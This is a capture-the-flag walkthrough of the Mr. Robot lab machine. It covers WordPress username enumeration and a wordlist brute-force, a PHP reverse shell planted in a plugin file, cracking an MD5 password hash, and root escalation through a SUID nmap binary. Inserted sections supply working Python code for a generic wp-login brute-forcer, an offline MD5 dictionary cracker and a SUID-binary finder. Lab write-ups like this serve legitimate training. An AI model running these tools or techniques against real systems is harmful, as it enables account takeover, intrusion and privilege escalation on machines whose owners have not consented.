From IMDB, Mr. Robot series: “Elliot, a brilliant but highly unstable young cyber-security engineer and vigilante hacker, becomes a key figure in a complex game of global dominance when he and his shadowy allies try to take down the corrupt corporation he works for.”
- valuable information exposed in /robots.txt
- a wordlist leaked via /robots.txt made it possible to brute-force the WordPress login
- a user's password, stored as an MD5 hash in a file in their home folder, was cracked
- an SUID binary was exploited for privilege escalation
◇ port 80 http
◇ port 443 https
◇ both ports serve the same site
Wappalyzer shows the site runs on the WordPress CMS.
The first flag is exposed in /robots.txt
A wordlist is also available for download: fsocity.dic, 858160 lines
The wordlist can be condensed considerably, since most lines are duplicates (uniq alone only drops adjacent duplicates, so sort first; sort -u does both in one pass):
sort -u fsocity.dic > fsocity_uniq.txt
# fsocity_uniq.txt: 11451 lines
Browsing to /ascpath opens a WordPress blog.
The main character of Mr. Robot is Elliot, and the login page confirms the username exists: WordPress returns a different error for a valid user with a wrong password ("The password you entered for the username elliot is incorrect") than for an unknown user ("Invalid username"), which is a username-enumeration oracle.
$wpscan --url http://10.10.104.200/wp-login.php --usernames elliot --passwords fsocity_uniq.txt -t 40
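As an added example, not part of the original write-up or of wpscan, the same two steps in plain Python: classify a wp-login.php response (this is exactly the oracle that confirms "elliot" is a valid username), then run the wordlist against that user. The target URL, the wordlist name and the fake transport used for testing are assumptions; the error strings match WordPress 4.x wording, and newer versions phrase them differently, so adjust classify_login before pointing this at another site.

```python
# Added example, not from the write-up: a minimal wp-login.php brute-forcer
# built around the response classification that also enables username enumeration.
# Assumptions: target URL and wordlist path are illustrative; error strings are
# WordPress 4.x wording (newer releases word the "unknown user" error differently).
import urllib.error
import urllib.parse
import urllib.request


def classify_login(status, headers, body):
    """Classify one POST /wp-login.php response.

    headers: dict with lower-case keys. Returns one of
      "success"        - 30x redirect that sets a wordpress_logged_in cookie
      "wrong_password" - user exists, password rejected (username confirmed)
      "invalid_user"   - user does not exist
      "unknown"        - anything else (lockout plugin, rate limit, error page)
    """
    set_cookie = headers.get("set-cookie", "")
    if status in (301, 302) and "wordpress_logged_in" in set_cookie:
        return "success"
    if "password you entered for the username" in body:
        return "wrong_password"
    if "Invalid username" in body or "is not registered on this site" in body:
        return "invalid_user"
    return "unknown"


class _NoRedirect(urllib.request.HTTPRedirectHandler):
    """Do not follow redirects: the 302 itself is the success signal we want to see."""
    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None


def http_post_login(url, username, password, timeout=10):
    """Real transport: POST the standard WordPress login form, return (status, headers, body)."""
    data = urllib.parse.urlencode({
        "log": username, "pwd": password, "wp-submit": "Log In",
        "redirect_to": url, "testcookie": "1",
    }).encode()
    req = urllib.request.Request(
        url, data=data, headers={"Cookie": "wordpress_test_cookie=WP+Cookie+check"})
    try:
        resp = urllib.request.build_opener(_NoRedirect).open(req, timeout=timeout)
    except urllib.error.HTTPError as err:   # unfollowed 3xx is raised as HTTPError
        resp = err
    headers = {k.lower(): v for k, v in resp.headers.items()}
    # Set-Cookie may repeat; join all copies so the logged_in cookie is never lost
    headers["set-cookie"] = "; ".join(resp.headers.get_all("set-cookie") or [])
    return resp.getcode(), headers, resp.read().decode("utf-8", "replace")


def check_username(post, url, username):
    """Username enumeration: a wrong password for a real user yields 'wrong_password'."""
    return classify_login(*post(url, username, "definitely-not-the-password")) == "wrong_password"


def brute_force(post, url, username, passwords):
    """Try each password in order; return (password, attempts) or (None, attempts)."""
    attempts = 0
    for candidate in passwords:
        candidate = candidate.rstrip("\r\n")   # wordlist lines keep their newline
        if not candidate:
            continue
        attempts += 1
        verdict = classify_login(*post(url, username, candidate))
        if verdict == "success":
            return candidate, attempts
        if verdict == "invalid_user":
            raise ValueError(f"username {username!r} does not exist, stop wasting requests")
    return None, attempts


if __name__ == "__main__":
    # Assumed target and wordlist (from the write-up); run only against a box you own.
    target = "http://10.10.104.200/wp-login.php"
    with open("fsocity_uniq.txt", encoding="utf-8", errors="replace") as wordlist:
        print(brute_force(http_post_login, target, "elliot", wordlist))
```

The transport is injected so the loop can be exercised against a fake server; `post` only has to return the (status, headers, body) triple. Raising on "invalid_user" matters in practice: a typo in the username would otherwise burn the whole wordlist and any lockout budget for nothing.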
Once the password is cracked and Elliot is logged in (an administrator account), the classic route to a reverse shell is the plugin editor: replace the contents of a plugin .php file with PHP reverse-shell code that connects back to a listener you have already started. This only works if the built-in file editor has not been disabled (DISALLOW_FILE_EDIT in wp-config.php).
After the script is modified, navigate to /wp-content/plugins/hello.php (the Hello Dolly plugin) to execute the reverse shell.
The reverse shell runs as the "daemon" user. This user cannot read the second flag but can read an MD5 hash in the "robot" user's home folder.
Crack the hash and switch to the "robot" user to read the second flag. su needs an interactive TTY, so upgrade the reverse shell to a pty first.
- the hash can be looked up on crackstation.net, or cracked offline with hashcat or John the Ripper (raw MD5)
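As an added example, not part of the original write-up, here is the offline alternative to pasting the hash into crackstation: a raw-MD5 dictionary attack that accepts either a bare hash or a user:hash line, strips the line endings that otherwise make every candidate hash wrong, and applies a few cheap mangling rules. The hash line and wordlist below are constructed for the demo; on the box you would feed it the file from robot's home folder and fsocity_uniq.txt.

```python
# Added example, not from the write-up: offline raw-MD5 dictionary attack.
# The demo hash line and wordlist below are constructed for illustration.
import hashlib

HEX = set("0123456789abcdef")


def parse_hash_line(line):
    """Accept 'hash' or 'user:hash'; return (user or None, lower-case 32-hex digest)."""
    line = line.strip()
    user, digest = line.rsplit(":", 1) if ":" in line else (None, line)
    digest = digest.lower()
    if len(digest) != 32 or set(digest) - HEX:
        raise ValueError(f"not a raw MD5 hex digest: {digest!r}")
    return user, digest


def candidates(word):
    """The word itself plus cheap mangling: capitalised form and common suffixes."""
    for base in (word, word.capitalize()):
        yield base
        for suffix in ("1", "123", "!"):
            yield base + suffix


def crack_md5(digest, wordlist, mangle=True):
    """Return the first candidate whose MD5 equals digest, else None.

    wordlist: iterable of lines. Trailing CR/LF is stripped (hashing 'word\\n'
    instead of 'word' is the classic reason a dictionary attack finds nothing)
    and blank lines are skipped.
    """
    target = digest.lower()
    for line in wordlist:
        word = line.rstrip("\r\n")
        if not word:
            continue
        for cand in (candidates(word) if mangle else (word,)):
            if hashlib.md5(cand.encode("utf-8", "surrogateescape")).hexdigest() == target:
                return cand
    return None


def crack_file(hash_lines, wordlist_lines):
    """Crack every hash line against one wordlist; returns {user-or-hash: password-or-None}."""
    words = list(wordlist_lines)          # materialise: reused once per hash
    result = {}
    for line in hash_lines:
        if not line.strip():
            continue
        user, digest = parse_hash_line(line)
        result[user or digest] = crack_md5(digest, words)
    return result


# Constructed demo data (not the box's real hash or wordlist).
DEMO_WORDLIST = ["password\n", "fsociety\n", "\n", "elliot\r\n", "mrrobot\n"]
DEMO_HASH_LINE = "robot:" + hashlib.md5(b"Elliot123").hexdigest()

if __name__ == "__main__":
    print(crack_file([DEMO_HASH_LINE], DEMO_WORDLIST))
    # Real use: crack_file(open("password.raw-md5"), open("fsocity_uniq.txt"))
```

Open the real wordlist with errors="surrogateescape" if it contains non-UTF-8 bytes; the encode call above round-trips them so such entries are still hashed byte-for-byte.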
The third flag is most likely in /root, so privileges must be escalated.
Searching for files with the SUID bit set turns up the nmap binary, owned by root.
According to GTFOBins (https://gtfobins.github.io/gtfobins/nmap/#suid), older nmap releases have an interactive mode (--interactive) from which !sh spawns a shell; because the binary is SUID root, that shell keeps root as its effective uid. Confirm with id that euid=0 before looking for the flag.
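The SUID search is normally a one-liner (find / -perm -4000 -type f 2>/dev/null). As an added example, not part of the original write-up or of GTFOBins, the same enumeration in Python, which also filters the hits down to root-owned binaries whose names appear on GTFOBins' SUID list; KNOWN_GTFOBINS is a small hand-picked subset of that list, not the full one, and demo_tree builds a throwaway directory so the scan can be exercised without root.

```python
# Added example, not from the write-up: enumerate SUID files and flag the
# root-owned ones that GTFOBins lists as shell-spawning (nmap is the one found here).
# KNOWN_GTFOBINS is a partial, hand-picked subset of the GTFOBins SUID list.
import os
import stat

KNOWN_GTFOBINS = {"nmap", "find", "vim", "vim.basic", "bash", "python", "python3",
                  "less", "more", "env"}
SKIP_DIRS = {"/proc", "/sys", "/dev", "/run"}   # pseudo filesystems: slow, never SUID


def is_suid(path):
    """True for a regular file with the set-uid bit (symlinks are not followed)."""
    try:
        st = os.lstat(path)
    except OSError:
        return False
    return stat.S_ISREG(st.st_mode) and bool(st.st_mode & stat.S_ISUID)


def find_suid(root="/", skip=SKIP_DIRS):
    """Return sorted [(path, owner_uid)] for every SUID regular file under root."""
    found = []
    for dirpath, dirnames, filenames in os.walk(root, onerror=lambda err: None):
        # prune in place so os.walk never descends into the skipped trees
        dirnames[:] = [d for d in dirnames if os.path.join(dirpath, d) not in skip]
        for name in filenames:
            path = os.path.join(dirpath, name)
            if is_suid(path):
                found.append((path, os.lstat(path).st_uid))
    return sorted(found)


def root_owned_escalators(suid_files):
    """Keep root-owned (uid 0) hits whose basename is on the GTFOBins subset."""
    return sorted(p for p, uid in suid_files
                  if uid == 0 and os.path.basename(p) in KNOWN_GTFOBINS)


def demo_tree(directory):
    """Constructed demo: one fake SUID 'nmap' and one plain 'ls' under directory.
    Returns (suid_path, plain_path). Setting the bit on a file you own needs no root."""
    os.makedirs(directory, exist_ok=True)
    suid_path = os.path.join(directory, "nmap")
    plain_path = os.path.join(directory, "ls")
    for p in (suid_path, plain_path):
        open(p, "w").close()
    os.chmod(suid_path, 0o4755)
    os.chmod(plain_path, 0o755)
    return suid_path, plain_path


if __name__ == "__main__":
    hits = find_suid("/")
    for path, uid in hits:
        print(f"{uid:6d} {path}")
    print("worth a look:", root_owned_escalators(hits))
```

Ownership matters as much as the bit: a SUID binary owned by an unprivileged user only gets you that user, which is why the filter checks uid 0 rather than the bit alone.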
The third flag is in /root